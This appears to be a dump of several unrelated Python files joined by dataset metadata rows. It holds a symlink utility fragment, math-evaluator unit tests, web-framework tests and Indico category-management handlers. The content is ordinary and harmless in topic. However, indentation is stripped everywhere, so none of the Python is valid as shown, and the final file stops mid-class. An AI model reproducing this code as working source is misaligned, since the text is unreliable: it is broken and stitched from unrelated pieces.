def config() -> None:
"""
Configure program
"""
if hasattr(signal, 'SIGPIPE'):
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
if os.name == 'nt':
argv = []
for arg in sys.argv:
files = glob.glob(arg) # Fixes Windows globbing bug
if files:
argv.extend(files)
else:
argv.append(arg)
sys.argv = argv
def _link_files(
self,
source_dir: str,
target_dir: str,
subdir: str = '',
) -> None:
try:
source_files = sorted([
os.path.join(source_dir, x)
for x in os.listdir(source_dir)
])
except PermissionError:
return
if not os.path.isdir(target_dir):
print('Creating "' + target_dir + '" directory...')
try:
os.mkdir(target_dir)
except OSError as exception:
raise SystemExit(
sys.argv[0] + ': Cannot create "' + target_dir +
'" directory.'
) from exception
for source_file in sorted(source_files):
target_file = os.path.join(
target_dir,
os.path.basename(source_file)
)
if os.path.isdir(source_file):
self._link_files(
source_file,
target_file,
os.path.join(os.pardir, subdir)
)
else:
if os.path.islink(target_file):
print('Updating "' + target_file + '" link...')
try:
os.remove(target_file)
except OSError as exception:
raise SystemExit(
sys.argv[0] + ': Cannot remove "' + target_file +
'" link.'
) from exception
else:
print('Creating "' + target_file + '" link...')
if os.path.isabs(source_file):
file = source_file
else:
file = os.path.join(subdir, source_file)
try:
os.symlink(file, target_file)
except OSError as exception:
raise SystemExit(
sys.argv[0] + ': Cannot create "' +
target_file + '" link.'
) from exception
file_stat = file_mod.FileStat(file)
file_time = file_stat.get_time()
os.utime(
target_file,
(file_time, file_time),
follow_symlinks=False,
)
def run(self) -> int:
"""
Start program
"""
options = Options()
for directory in options.get_directories():
self._link_files(directory, '.')
return 0
if '--pydoc' in sys.argv:
help(__name__)
else:
Main()
| gpl-2.0 | 8,102,982,425,260,739,000 | 27.091429 | 77 | 0.450976 | false |
iScienceLuvr/PPP-CAS | tests/testEvaluation.py | 1 | 11865 | from ppp_cas.evaluator import evaluate
from unittest import TestCase
from sympy import latex
class TestEvaluation(TestCase):
def procedure(self, testCases):
for (expr, res) in testCases:
string, latex = evaluate(expr)
self.assertEqual(latex, res)
def testNumeric(self):
testCases = [('2/4', '\\frac{1}{2}'),
('4/2', '2'),
('Sqrt[4]', '2'),
('2^42', '4398046511104'),
('sqrt(4)', '2'),
('sqrt((42)**(pi))', '42^{\\frac{\\pi}{2}}'),
('10!', '3628800'),
]
self.procedure(testCases)
def testSimplify(self):
testCases = [('sqrt(x)**2', 'x'),
('Sqrt[x]^2', 'x'),
('x-x', '0'),
('sin(x)**2+cos(x)**2', '1'),
('(n+1)!/n!', 'n + 1'),
]
self.procedure(testCases)
def testSympyLanguage(self):
testCases = [('diff(x**2,x)', '2 x'),
('2*integrate(exp(-x**2/2), (x,(-oo,oo)))', '2 \\sqrt{2} \\sqrt{\\pi}'),
('summation(1/n**2, (n,(1,oo)))', '\\frac{\\pi^{2}}{6}'),
('(n+1)*n!-(n+1)!', '0'),
('N(GoldenRatio,100)', '1.618033988749894848204586834365638117720309179805762862135448622705260462818902449707207204189391137'),
('N(EulerGamma,100)', '0.5772156649015328606065120900824024310421593359399235988057672348848677267776646709369470632917467495'),
('Pow(1024,1/2)', '32'),
('Abs(1)', '1'),
('floor(-Pi)', '-4'),
('ceiling(-Pi)', '-3'),
('floor(Pi)', '3'),
('ceiling(Pi)', '4'),
('(a/(b+1)/c)+1/(d+1)', '\\frac{a \\left(d + 1\\right) + c \\left(b + 1\\right)}{c \\left(b + 1\\right) \\left(d + 1\\right)}'),
('diff(erf(x),x)','\\frac{2}{\\sqrt{\\pi}} e^{- x^{2}}'),
]
self.procedure(testCases)
def testMathematicaLanguage(self):
testCases = [('Integrate[Exp[-x^2/2], {x, -Infinity, Infinity}]', '\\sqrt{2} \\sqrt{\\pi}'),
('Sum[1/i^6, {i, 1, Infinity}]', '\\frac{\\pi^{6}}{945}'),
('Sum[j/i^6, {i, 1, Infinity}, {j, 0 ,m}]', '\\frac{\\pi^{6} m}{1890} \\left(m + 1\\right)'),
('Integrate[1/(x^3 + 1), x]', '\\frac{1}{3} \\log{\\left (x + 1 \\right )} - \\frac{1}{6} \\log{\\left (x^{2} - x + 1 \\right )} + \\frac{\\sqrt{3}}{3} \\operatorname{atan}{\\left (\\frac{\\sqrt{3}}{3} \\left(2 x - 1\\right) \\right )}'),
('Integrate[1/(x^3 + 1), {x, 0, 1}]', '\\frac{1}{3} \\log{\\left (2 \\right )} + \\frac{\\sqrt{3} \\pi}{9}'),
('Integrate[Sin[x*y], {x, 0, 1}, {y, 0, x}]', '- \\frac{1}{2} \\operatorname{Ci}{\\left (1 \\right )} + \\frac{\\gamma}{2}'),
('D[x^2,x]', '2 x'),
('D[x^3,x,x]', '6 x'),
('D[x^4, {x,2}]', '12 x^{2}'),
('D[x^4*Cos[y^4], {x,2}, {y,3}]', '96 x^{2} y \\left(8 y^{8} \\sin{\\left (y^{4} \\right )} - 18 y^{4} \\cos{\\left (y^{4} \\right )} - 3 \\sin{\\left (y^{4} \\right )}\\right)'),
('D[x^4*Cos[y]^z, {x,2}, y, {z,3}]', '- 12 x^{2} \\left(z \\log{\\left (\\cos{\\left (y \\right )} \\right )} + 3\\right) \\log^{2}{\\left (\\cos{\\left (y \\right )} \\right )} \\sin{\\left (y \\right )} \\cos^{z - 1}{\\left (y \\right )}'),
('Sin\'[x]', '\\cos{\\left (x \\right )}'),
('N[Pi]', '3.14159265358979'),
('N[Sqrt[2], 100]', '1.414213562373095048801688724209698078569671875376948073176679737990732478462107038850387534327641573'),
('N[GoldenRatio,100]', '1.618033988749894848204586834365638117720309179805762862135448622705260462818902449707207204189391137'),
('N[EulerGamma,100]', '0.5772156649015328606065120900824024310421593359399235988057672348848677267776646709369470632917467495'),
('N[Power[1024, 0.5]]', '32.0'),
('Log[Exp[x^n]]', '\\log{\\left (e^{x^{n}} \\right )}'),
('Log10[Exp[x^n]]', '\\frac{\\log{\\left (e^{x^{n}} \\right )}}{\\log{\\left (10 \\right )}}'),
('Log10[1000]', '3'),
('Factorial[10]', '3628800'),
('N[Factorial[3.1]/Factorial[2.1]]', '3.1'),
('Abs[1]', '1'),
('Abs[-1]', '1'),
('Abs[x]', '\\left\\lvert{x}\\right\\rvert'),
('Abs[-Pi]', '\\pi'),
('Floor[-Pi]', '-4'),
('Ceiling[-Pi]', '-3'),
('Floor[Pi]', '3'),
('Ceiling[Pi]', '4'),
('Limit[Sin[x]/x, x->0]', '1'),
('Limit[(1+x/n)^n, n->Infinity]', 'e^{x}'),
('Limit[Sum[1/i, {i, 1, n}]- Log[n], n->Infinity]', '\\gamma'),
('Solve[x^2==1, x]', '\\left [ \\left ( -1\\right ), \\quad \\left ( 1\\right )\\right ]'),
('Expand[(x+1)*(x-1)]', 'x^{2} - 1'),
('Factor[x^2+x]', 'x \\left(x + 1\\right)'),
('Prime[5]', '11'),
('PrimeQ[5]', '\\mathrm{True}'),
]
self.procedure(testCases)
def testCalchas(self):
testCases = [('3^3', '27'),
('4**4', '256'),
('12%5', '2'),
('Numeric(Pi)', '3.14159265358979'),
('eval(Sqrt(2), 100)', '1.414213562373095048801688724209698078569671875376948073176679737990732478462107038850387534327641573'),
('approx(GoldenRatio,100)', '1.618033988749894848204586834365638117720309179805762862135448622705260462818902449707207204189391137'),
('evalf(EulerGamma,100)', '0.5772156649015328606065120900824024310421593359399235988057672348848677267776646709369470632917467495'),
('power(32,2)', '1024'),
('Pow(1024,1/2)', '32'),
('Power(1024,1/2)', '32'),
('sqrt(64)', '8'),
('root(27,3)', '3'),
('N(Power(1024, 0.5))', '32.0'),
('Log10(Exp(x**n))', '\\frac{\\log{\\left (e^{x^{n}} \\right )}}{\\log{\\left (10 \\right )}}'),
('Log10(1000)', '3'),
('Lg(1000)', '3'),
('ln(exp(1))', '1'),
('Log(1000,10)', '3'),
('log(1024,2)', '10'),
('lb(1024)', '10'),
('Factorial(10)', '3628800'),
('Gamma(3/2)', '\\frac{\\sqrt{\\pi}}{2}'),
('N(Factorial(3.1)/Fact(2.1))', '3.1'),
('Abs(1)', '1'),
('Abs(-1)', '1'),
('Abs(x)', '\\left\\lvert{x}\\right\\rvert'),
('Ceiling(-Pi)', '-3'),
('Floor(-Pi)', '-4'),
('ceil(-Pi)', '-3'),
('Floor(Pi)', '3'),
('ceil(pi)', '4'),
('sgn(0)', '0'),
('Signum(-gamma)', '-1'),
('sig(Phi)', '1'),
('Sign(-e)', '-1'),
('sin(pi/3)', '\\frac{\\sqrt{3}}{2}'),
('cos(pi/3)', '\\frac{1}{2}'),
('tan(pi/3)', '\\sqrt{3}'),
('arcsin(1/2)', '\\frac{\\pi}{6}'),
('acos(1/2)', '\\frac{\\pi}{3}'),
('aTan(1)', '\\frac{\\pi}{4}'),
('C(6,4)', '15'),
('C(6,-1)', '0'),
('C(6,6)', '1'),
('C(6,7)', '0'),
('C(-1,4)', '\\mathrm{NaN}'),
('C(-1,-2)', '\\mathrm{NaN}'),
('C(-2,-1)', '\\mathrm{NaN}'),
('C(-2.5,-1.5)', '0'),
('C(1.3,3.7)', '0.0284312028601124'),
('C(3.7,1.3)', '4.43659695748368'),
('gcd(6,4)', '2'),
('lcm(n,m)hcf(n,m)', 'm n'),
('Diff(x^4*Cos(y)^z, {x,2}, y, {z,3})', '- 12 x^{2} \\left(z \\log{\\left (\\cos{\\left (y \\right )} \\right )} + 3\\right) \\log^{2}{\\left (\\cos{\\left (y \\right )} \\right )} \\sin{\\left (y \\right )} \\cos^{z - 1}{\\left (y \\right )}'),
('diff(x**2 y^3,x)', '2 x y^{3}'),
('derivate(x**2 y^3,x)', '2 x y^{3}'),
('derivative(x**2 y^3,x)', '2 x y^{3}'),
('integral(Exp(-x^2/2), x, -infinity, oo)', '\\sqrt{2} \\sqrt{\\pi}'),
('integral(Exp(-x**2/2), x, -infinity, oo)', '\\sqrt{2} \\sqrt{\\pi}'),
('sum(1/i^6, i, 1, Infty)', '\\frac{\\pi^{6}}{945}'),
('int(1/(x^3 + 1), x)', '\\frac{1}{3} \\log{\\left (x + 1 \\right )} - \\frac{1}{6} \\log{\\left (x^{2} - x + 1 \\right )} + \\frac{\\sqrt{3}}{3} \\operatorname{atan}{\\left (\\frac{\\sqrt{3}}{3} \\left(2 x - 1\\right) \\right )}'),
('Integrate(1/(x^3 + 1), x, 0, 1)', '\\frac{1}{3} \\log{\\left (2 \\right )} + \\frac{\\sqrt{3} \\pi}{9}'),
('solve(ch(x)=y,x)', '\\left [ \\left ( \\log{\\left (y - \\sqrt{y^{2} - 1} \\right )}\\right ), \\quad \\left ( \\log{\\left (y + \\sqrt{y^{2} - 1} \\right )}\\right )\\right ]'),
('solve(sinh(x)==y,x)', '\\left \\{ x : \\operatorname{asinh}{\\left (y \\right )}\\right \\}'),
('lim(sin(x)/x, x, 0)', '1'),
('limit(tan(x), x, Pi/2)', '-\\infty'),
('LimitR(tan(x), x, Pi/2)', '-\\infty'),
('Liml(tan(x), x, 1/2*Pi)', '\\infty'),
('sin(x)^2+cos(x)^2=1', '\\mathrm{True}'),
('3=4', '\\mathrm{False}'),
('2=2', '\\mathrm{True}'),
('x=y', 'x = y'),
('2f(x)b', '2 b f{\\left (x \\right )}'),
("sin'''(x)","- \\cos{\\left (x \\right )}"),
("log''(x)","- \\frac{1}{x^{2}}"),
("abs'(x)","\\frac{1}{\\left\\lvert{x}\\right\\rvert} \\left(\\Re{x} \\frac{d}{d x} \\Re{x} + \\Im{x} \\frac{d}{d x} \\Im{x}\\right)"),
("sqrt'(x)","\\frac{1}{2 \\sqrt{x}}"),
('isprime(5)','\mathrm{True}'),
('prime(5)','11'),
('x & x & x | x & y','x'),
('satisfiable(x & x & x | x & y)','\\left \\{ x : \\mathrm{True}, \\quad y : \\mathrm{True}\\right \\}'),
('satisfiable(x & ~y)','\\left \\{ x : \\mathrm{True}, \\quad y : \\mathrm{False}\\right \\}'),
('satisfiable(x & ~x)','\\mathrm{False}'),
('satisfiable(x | ~x)','\\left \\{ x : \\mathrm{False}\\right \\}'),
('D(erf(x),x)','\\frac{2}{\\sqrt{\\pi}} e^{- x^{2}}'),
]
self.procedure(testCases)
def testLatex(self):
testCases = [("\\sqrt{9}", "3"),
("\\frac{42}{1337}", "\\frac{6}{191}"),
("\\sqrt[3]{27}", "3"),
("\\sum_{i=1}^\\infty (1/i^{2})", "\\frac{\\pi^{2}}{6}"),
("\\sum_{i=1}^\\infty (1/pow(i,2))", "\\frac{\\pi^{2}}{6}"),
("\\binom{6}{4}", "15"),
("\\sqrt{x^2}", "\\sqrt{x^{2}}"),
("2\\times(1+3)", "8"),
]
self.procedure(testCases)
| mit | -2,678,843,502,815,292,400 | 60.796875 | 266 | 0.365023 | false |
kdart/pycopia | WWW/test.py | 1 | 11133 | #!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
"""
import sys
import unittest
import webbrowser
import simplejson
from cStringIO import StringIO
from datetime import datetime
from pycopia.aid import Enums, NULL
from pycopia import urlparse
from pycopia.XML import POM
from pycopia import dtds
from pycopia import table
from pycopia.WWW import fcgiserver
from pycopia.WWW import framework
from pycopia.WWW import XHTML
from pycopia.WWW import rss
from pycopia.WWW import rst
from pycopia.WWW import serverconfig
from pycopia.WWW import urllibplus
from pycopia.WWW import useragents
from pycopia.WWW import json
XHTMLFILENAME = "/tmp/testXHTML.html"
MOBILEAGENT1 = "Nokia6680/1.0 ((4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1)"
MOBILEAGENT2 = 'MOT-V3/0E.41.C3R MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 UP.Link/6.3.1.17.06.3.1.17.0'
WML = "text/wml, text/vnd.wap.wml"
def _JsonTest(arg1):
return arg1
# function for dynamic content test.
def thedate():
return unicode(datetime.now())
class WWWTests(unittest.TestCase):
def test_lighttpdconfig(self):
t = serverconfig.LighttpdConfig()
t.add_vhost("www.pycopia.net", ["nmsapps"])
t.add_vhost("www.pycopia.org", ["nmsapps", "webtools"])
t.emit(sys.stdout)
def test_XHTML(self):
"""Construct an XHTML page. Verify visually."""
htd = XHTML.new_document(dtds.XHTML)
htd.title = "This is the title."
htd.add_header(1, 'Main document & "stuff"')
htd.new_para("This is a test. This is text.")
htd.add_unordered_list(["List line one.", "list line two."])
BR = htd.get_new_element("Br")
A = htd.get_new_element("A", href="somelink.html")
A.add_text("some link")
p = htd.get_para()
p.append(A)
p.add_text(" This is ")
b = p.bold("bold")
p.add_text(" text. using ")
stb = htd.get_new_element("B")
stb.add_text("bold tags")
p.text(stb)
p.add_text(" Dynamic Date: ")
p.append(XHTML.DynamicNode(thedate))
rp = str(p)
htd.append(POM.ASIS(rp))
# table methods
t = htd.add_table(border=1)
t.summary = "This is a test table."
t.caption("table caption")
h = t.set_heading(2, "heading col 2")
h.set_attribute("class", "headerclass")
t.set_heading(1, "heading col 1")
t.set_cell(1,1,"row 1, col 1")
t.set_cell(1,2,"row 2, col 1")
t.set_cell(2,1,"row 1, col 2")
t.set_cell(2,2,"row 2, col 2")
# sections
div = htd.get_section("section1")
div.add_header(1, "Div heading.")
div.new_para("First div para.")
htd.append(div)
div2 = div.get_section("section2")
div2.new_para("Second div para")
div.append(div2)
dl = div.add_definition_list()
dl.add_definitions({"def1":"The definition of 1",
"def2": "The definition of 2"})
# using the nodemaker object
NM = htd.nodemaker
ul = NM("Ul", None,
NM("Li", None, "line 1"),
NM("Li", None, "line 2"),
NM("Li", None, "Date: ", NM("code", None, thedate)), # another way to add dynamic node
)
htd.append(ul)
htd.append(NM("JS", None, 'var a = new Array(8);'))
# using the creator object.
creator = htd.creator
parts = creator([("Just", "just/"), "How will this turn out?", ["It is hard to tell.", "Well, not too hard."]])
htd.add_comment("the name attribute is required for all but submit & reset")
htd.append(parts)
f = htd.add_form(action="http://localhost:4001/cgi-bin/testing.py", method="post")
f.add_textarea("mytextarea", """Default text in the textarea.""") ; f.append(BR)
f.add_input(type="text", name="mytext", value="mytext text") ; f.append(BR)
f.add_input(type="button", name="button1", src="button.png", value="Button") ; f.append(BR)
f.add_input(type="submit", name="submit1", src="submit.png", value="Ok") ; f.append(BR)
f.add_radiobuttons("radlist", ["one", "two", "three", "four"], vertical=False) ; f.append(BR)
f.add_checkboxes("checks", ["one", "two", "three", "four"], vertical=True) ; f.append(BR)
f.add_fileinput(name="myfile", default="/etc/hosts") ; f.append(BR)
f.add_textinput(name="mytext", label="Enter text") ; f.append(BR)
f.yes_no("What's it gonna be?")
f.add_select(["one", "two", ("three", True), "four",
{"agroup": ["group1", "group2"]}],
name="myselect") ; f.append(BR)
f.add_select({"Group1": Enums("g1one", "g1two", "g1three")+[("g1four", True)],
"Group2": Enums("g2one", "g2two", "g2three"),
"Group3": Enums("g3one", "g3two", "g3three"),
}, name="useenums") ; f.append(BR)
f.add_select(["mone", "mtwo", ("mthree", True), ("mfour", True)], name="multiselect", multiple=True) ; f.append(BR)
set = f.add_fieldset("afieldset")
set.add_textinput(name="settext", label="Enter set text")
set.add_textinput(name="settext2", label="Enter set text 2", default="Default text.")
set.append(BR)
tbl = htd.new_table([1,2,3,4,5],
[NULL, NULL, NULL],
["col1", "col2", "col3"], width="100%", summary="autogenerated")
gentable = table.GenericTable(["heading1", "heading2", "heading3"],
title="Sample generic table")
gentable.append([1,2,3])
gentable.append([4,5,6])
tbl2 = htd.new_table_from_GenericTable(gentable)
# object
subdoc = XHTML.new_document(dtds.XHTML)
parts = subdoc.creator(("Add a document object.", ["Some data.", "some more data.."]))
subdoc.append(parts)
sdfo = open("/tmp/subdoc.html", "w")
subdoc.emit(sdfo)
sdfo.close()
htd.add_object(data="subdoc.html", type=subdoc.MIMETYPE,
width="400px", height="600px")
htd.emit(sys.stdout)
print "-----"
fo = open(XHTMLFILENAME, "w")
bw = POM.BeautifulWriter(fo, XHTML.INLINE)
htd.emit(bw)
fo.close()
print "----- Form values:"
print f.fetch_form_values()
print "----- Form elements:"
felems = f.fetch_form_elements()
for name, elemlist in felems.items():
print repr(name), ": ", repr(elemlist)
print
# visually verify the page.
webbrowser.open("file://%s" % (XHTMLFILENAME,))
def test_requesthandler(self):
class MyHandler(framework.RequestHandler):
def get(self, request):
pass
h = MyHandler(framework.default_doc_constructor)
print h._implemented
def test_urlmap(self):
def F(r):
pass
m = framework.URLMap(r'^/selftest/(?P<patt1>\S+)/(?P<patt2>\d+)/$', F)
path = m.get_url(patt1="part1", patt2="22")
print m
print path
self.assertEqual(path, "/selftest/part1/22/")
self.assertTrue( m.match(path))
def test_Zfetch(self):
doc = XHTML.get_document("http://www.pycopia.net/")
self.assertEqual(doc.title.get_text(), "Python Application Frameworks")
# write it out for inspection
# Note that the document was parsed, and regenerated.
fo = open("/tmp/pycopia_net.html", "w")
try:
doc.emit(fo)
finally:
fo.close()
print "Fetched document found here: /tmp/pycopia_net.html"
def test_Zfetchmobile(self):
doc = XHTML.get_document(
"http://www.google.com/gwt/n?u=http://www.pynms.net",
mimetype=WML,
useragent=MOBILEAGENT2)
print "Mobile doctype:", doc.DOCTYPE
# write it out for inspection
# Note that the document was parsed, and regenerated.
fo = open("/tmp/test_WWW_mobile.html", "w")
try:
doc.emit(fo)
finally:
fo.close()
print "Fetched document found here: /tmp/test_WWW_mobile.html"
# fetches a chinese, transcoded WML page.
# XXX currently broken due to bad markup returned.
# def test_Zfetchwml(self):
# doc = XHTML.get_document(
# "http://www.google.cn/gwt/n?mrestrict=wml&site=search&q=NBA&source=m&output=wml&hl=zh-CN&ei=b99bRpDLAZzOogK1_Pwq&ct=res&cd=0&rd=1&u=http%3A%2F%2Fchina.nba.com%2F",
# mimetype=WML,
# useragent=MOBILEAGENT2)
# print "WML doctype:", doc.DOCTYPE
# self.assert_(type(doc) is XHTML.XHTMLDocument)
# self.assert_(str(doc.DOCTYPE).find("Mobile") > 0)
# # write it out for inspection
# # Note that the document was parsed, and regenerated.
# fo = open("/tmp/test_WWW_wml.html", "w")
# try:
# doc.emit(fo)
# finally:
# fo.close()
# print "Fetched document found here: /tmp/test_WWW_wml.html"
def test_rst(text):
renderer = rst.Renderer()
text = """
Heading
=======
Some Text.
"""
print renderer.render(text)
def test_JSONcodec(self):
data = [{"data": "test"}, 1]
enc = json.GetJSONEncoder()
dec = json.GetJSONDecoder()
self.assertEqual( dec.decode(enc.encode(data)), data)
def test_JSONhandler(self):
disp = json.JSONDispatcher([_JsonTest])
env = GetMockEnviron(disp)
req = framework.HTTPRequest(env)
response = disp(req, "_JsonTest")
self.assert_(isinstance(response, framework.HttpResponse))
self.assertEqual(response.headers["Content-Type"].value, "application/json")
content = simplejson.loads(response.content)
self.assertEqual(content, 1)
def GetMockEnviron(handler):
environ = {}
environ['REQUEST_METHOD'] = "POST"
environ['PATH_INFO'] = "/proxy/_JsonTest"
m = framework.URLMap(r'^/proxy/(?P<methodname>\w+)/$', handler)
environ["framework.get_url"] = m.get_url
q = 'data=%5B%22_JsonTest%22%2C+1%5D' # as PythonProxy would send a call from proxy._JsonTest(1)
inp = StringIO(q)
environ["CONTENT_TYPE"] = "application/x-www-form-urlencoded"
environ["CONTENT_LENGTH"] = len(q)
environ["wsgi.input"] = inp
environ["wsgi.errors"] = sys.stderr
return environ
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -7,756,537,204,763,291,000 | 36.611486 | 172 | 0.590317 | false |
belokop/indico_bare | indico/MaKaC/webinterface/rh/categoryMod.py | 1 | 16874 | # This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from flask import request
import tempfile
import MaKaC.webinterface.locators as locators
import MaKaC.webinterface.urlHandlers as urlHandlers
import MaKaC.webinterface.pages.category as category
from MaKaC.webinterface.user import UserListModificationBase
from indico.core.config import Config
from MaKaC.common.utils import validMail
from MaKaC.webinterface.rh.base import RHModificationBaseProtected
from MaKaC.errors import MaKaCError, FormValuesError, NotFoundError
import MaKaC.conference as conference
from indico.modules.users.legacy import AvatarUserWrapper
from indico.modules.groups.legacy import GroupWrapper
from indico.util.i18n import _
class RHCategModifBase( RHModificationBaseProtected ):
def _checkProtection(self):
if self._target.canModify( self.getAW() ):
RHModificationBaseProtected._checkProtection(self)
return
else:
self._doProcess = False
self._redirect(urlHandlers.UHCategoryDisplay.getURL(self._target))
def _checkParams(self, params):
l = locators.CategoryWebLocator(params)
self._target = l.getObject()
if self._target is None:
raise NotFoundError(_("The category with id '{}' does not exist or has been deleted").format(
params["categId"]),
title=_("Category not found"))
class RHCategoryModification(RHCategModifBase):
_uh = urlHandlers.UHCategoryModification
def _process(self):
p = category.WPCategoryModification(self, self._target)
return p.display()
class RHCategoryDataModif( RHCategModifBase ):
_uh = urlHandlers.UHCategoryDataModif
def _process( self ):
p = category.WPCategoryDataModification( self, self._target )
return p.display()
class RHCategoryPerformModification( RHCategModifBase ):
_uh = urlHandlers.UHCategoryPerformModification
def _checkParams(self, params):
RHCategModifBase._checkParams(self, params)
if params.get("name", "").strip() =="":
raise FormValuesError("Please, provide a name for the new subcategory")
def _getNewTempFile( self ):
cfg = Config.getInstance()
tempPath = cfg.getUploadedFilesTempDir()
tempFileName = tempfile.mkstemp( suffix="Indico.tmp", dir = tempPath )[1]
return tempFileName
def _saveFileToTemp(self, fs):
fileName = self._getNewTempFile()
fs.save(fileName)
return fileName
def _process( self):
params = self._getRequestParams()
if not "cancel" in params:
if (params.get("subcats","")):
subcat=True
else:
subcat=False
if (params.get("modifyConfTZ","")):
modifyConfTZ=True
else:
modifyConfTZ=False
tz = params.get("defaultTimezone", "UTC")
self._target.setTimezone( tz )
if modifyConfTZ:
self._target.changeConfTimezones( tz )
if params.get("name", "") != self._target.getName():
self._target.setName( params.get("name", "") )
self._target.setDescription( params.get("description", "") )
self._target.setDefaultStyle("simple_event",params.get("defaultSimpleEventStyle", ""),subcat )
self._target.setDefaultStyle("meeting",params.get("defaultMeetingStyle", ""),subcat)
if self._target.getVisibility() != int(params.get("visibility",999)):
self._target.setVisibility(params.get("visibility",999))
if self._getUser().isAdmin():
self._target.setSuggestionsDisabled('disableSuggestions' in request.form)
if "delete" in params and self._target.getIcon() is not None:
self._target.removeIcon()
if "icon" in params and type(params["icon"]) != str and \
params["icon"].filename.strip() != "":
if not hasattr(self, "_filePath"):
# do not save the file again if it has already been done (db conflicts)
self._filePath = self._saveFileToTemp(params["icon"])
self._tempFilesToDelete.append(self._filePath)
self._fileName = params["icon"].filename
f = conference.LocalFile()
f.setName( "Icon" )
f.setDescription( "This is the icon for the category" )
f.setFileName( self._fileName )
f.setFilePath( self._filePath )
self._target.setIcon( f )
self._redirect( urlHandlers.UHCategoryModification.getURL( self._target ) )
class RHCategoryAC( RHCategModifBase ):
_uh = urlHandlers.UHCategModifAC
def _process( self ):
p = category.WPCategModifAC( self, self._target )
return p.display()
class RHCategoryTools( RHCategModifBase ):
_uh = urlHandlers.UHCategModifTools
def _process( self ):
p = category.WPCategModifTools( self, self._target )
return p.display()
class RHCategoryCreation( RHCategModifBase ):
_uh = urlHandlers.UHCategoryCreation
def _process( self ):
p = category.WPCategoryCreation( self, self._target )
return p.display()
class RHCategoryPerformCreation( RHCategModifBase ):
_uh = urlHandlers.UHCategoryPerformCreation
def _checkParams(self, params):
RHCategModifBase._checkParams(self, params)
if params.get("name", "").strip() =="" and not ("cancel" in params):
raise FormValuesError("Please, provide a name for the new subcategory")
def _process( self ):
params = self._getRequestParams()
if not ("cancel" in params):
categAccessProtection = params.get("categProtection", "inherit")
if categAccessProtection == "private" :
protection = 1
elif categAccessProtection == "public" :
protection = -1
else:
protection = 0
nc = self._target.newSubCategory(protection)
nc.setTimezone( params.get("defaultTimezone"))
nc.setName( params.get("name", "") )
nc.setDescription( params.get("description", "") )
nc.setDefaultStyle("simple_event",params.get("defaultSimpleEventStyle", "") )
nc.setDefaultStyle("meeting",params.get("defaultMeetingStyle", "") )
if protection == 1:
allowedUsers = self._getAllowedUsers(params)
if allowedUsers :
for person in allowedUsers :
if isinstance(person, (AvatarUserWrapper, GroupWrapper)):
nc.grantAccess(person)
self._redirect( urlHandlers.UHCategoryModification.getURL( self._target ) )
def _getAllowedUsers(self, params):
auAvatars = []
from MaKaC.services.interface.rpc import json
allowedUsersDict = json.decode(params.get("allowedUsers"))
if allowedUsersDict :
auAvatars, auNewUsers, auEditedAvatars = UserListModificationBase.retrieveUsers({"allowedUserList":allowedUsersDict}, "allowedUserList")
return auAvatars
class _ActionSubCategDeletion:
def __init__( self, rh, target, selCategs ):
self._rh = rh
self._target = target
self._categs = selCategs
def askConfirmation( self, params ):
p = category.WPSubCategoryDeletion( self._rh, self._target )
return p.display( subCategs=self._categs )
def perform( self ):
for categ in self._categs:
for manager in categ.getManagerList():
categ.revokeModification(manager)
categ.delete()
class _ActionSortCategories:
def __init__( self, rh ):
self._rh = rh
def askConfirmation( self, params ):
return ""
def perform(self):
cl = self._rh._target.getSubCategoryList()
cl.sort(key=lambda c: c.getTitle().lower())
for categ in cl:
categ.setOrder(cl.index(categ))
class _ActionSubCategMove:
def __init__( self, rh, newpos, oldpos ):
self._rh = rh
self._newpos = int(newpos)
self._oldpos = int(oldpos)
def askConfirmation( self, params ):
return ""
def perform(self):
cl = self._rh._target.getSubCategoryList()
order = 0
movedcateg = cl[self._oldpos]
del cl[self._oldpos]
cl.insert(self._newpos,movedcateg)
for categ in cl:
categ.setOrder(cl.index(categ))
class _ActionSubCategReallocation:
def __init__( self, rh, target, selCategs ):
self._rh = rh
self._target = target
self._categs = selCategs
def askConfirmation( self, params ):
p = category.WPCategoryReallocation( self._rh, self._target )
params["subCategs"] = self._categs
return p.display( **params )
def perform( self ):
#check if the current user has modification privileges on the
# destination category
if not self._target.canModify( self._rh.getAW() ):
raise MaKaCError( _("cannot reallocate selected categoried to the selected destination because you are not authorised to modify the destination category"))
for categ in self._categs:
categ.move( self._target )
class RHCategoryActionSubCategs( RHCategModifBase ):
_uh = urlHandlers.UHCategoryActionSubCategs
def _checkParams( self, params ):
RHCategModifBase._checkParams( self, params )
categIdList = self._normaliseListParam(params.get("selectedCateg", []))
self._categs = []
self._confirmation = params.has_key("confirm")
if "cancel" in params:
return
cm = conference.CategoryManager()
for categId in categIdList:
self._categs.append( cm.getById( categId ) )
self._action = _ActionSubCategDeletion( self, self._target, self._categs )
if params.has_key("reallocate"):
self._action = _ActionSubCategReallocation( self, self._target, self._categs )
if params.has_key("oldpos") and params["oldpos"]!='':
self._confirmation = 1
self._action = _ActionSubCategMove( self, params['newpos'+params['oldpos']], params['oldpos'] )
if params.has_key("sort"):
self._confirmation = 1
self._action = _ActionSortCategories( self )
def _process( self ):
if not self._categs:
if self._confirmation:
#Move category
self._action.perform()
else:
if self._confirmation:
#remove, reallocate
self._action.perform()
else:
return self._action.askConfirmation(self._getRequestParams())
self._redirect(urlHandlers.UHCategoryModification.getURL(self._target))
class _ActionConferenceDeletion:
def __init__(self, rh, target, selConfs):
self._rh = rh
self._target = target
